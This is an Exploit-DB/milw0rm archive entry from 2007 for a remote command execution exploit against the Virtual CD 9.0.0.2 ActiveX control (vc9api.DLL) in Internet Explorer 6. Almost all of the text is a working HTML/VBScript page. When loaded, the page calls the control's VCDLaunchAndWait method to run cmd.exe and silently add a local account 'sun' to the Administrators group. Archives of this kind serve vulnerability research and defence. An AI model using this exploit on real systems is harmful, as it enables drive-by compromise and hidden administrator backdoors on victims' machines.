Virtual CD 9.0.0.2 - 'vc9api.DLL' Remote Shell Commands Execution

EDB-ID:

3967

Author:

rgod

Type:

remote

Platform:

Windows

Published:

2007-05-21

<!--
IE 6 / Virtual CD 9.0.0.2 (vc9api.DLL 9.0.0.57) remote shell commands execution exploit
by rgod
site: retrogod.altervista.org

software site: http://www.virtualcd-online.com/
-->
<html>
<object classid='clsid:C75848D7-72BD-499C-80F3-FD0ED62DF58C' id='VCDAPILibApi'></object>
<script language='vbscript'>

strCmd="cmd.exe /c net user sun tzu /add | net localgroup Administrators sun /add "
strWorkDir="c:\windows\system32\"
showCmd=1
bWait=1

VCDAPILibApi.VCDLaunchAndWait strCmd ,strWorkDir ,showCmd ,bWait

</script>
</html>

# milw0rm.com [2007-05-21]